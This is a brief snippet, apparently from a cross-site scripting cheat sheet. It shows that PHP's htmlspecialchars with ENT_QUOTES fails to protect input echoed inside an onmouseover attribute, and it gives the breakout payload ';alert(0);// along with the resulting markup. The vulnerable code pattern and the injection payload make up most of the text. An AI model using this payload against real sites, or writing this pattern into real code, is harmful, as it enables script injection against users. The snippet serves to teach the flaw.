On* and Style Entity Trick

<?php $foo htmlspecialchars($_GET['foo'], ENT_QUOTES);?>
<a href="" onmouseover="a='Fantas<?php echo $foo?>tic';">Mouse Over Me</a>
Input: ?foo=';alert(0);//
<a href="" onmouseover="a='Fantas&#039;;alert(0);//tic';">Mouse Over Me</a>
Output
Mouse Over Me